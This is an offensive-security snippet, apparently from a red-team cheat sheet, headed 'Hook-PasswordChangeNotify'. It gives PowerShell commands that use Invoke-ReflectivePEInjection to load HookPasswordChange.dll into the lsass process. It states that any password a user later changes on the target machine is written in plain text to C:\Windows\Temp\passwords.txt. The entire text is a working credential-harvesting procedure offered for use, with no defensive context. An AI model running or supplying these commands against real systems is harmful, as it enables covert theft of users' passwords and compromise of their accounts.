Hook-PasswordChangeNotify
- Execute the following command in PowerShell:
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
- When a user on the target machine changes their password, the new password will be written to C:\Windows\Temp\passwords.txt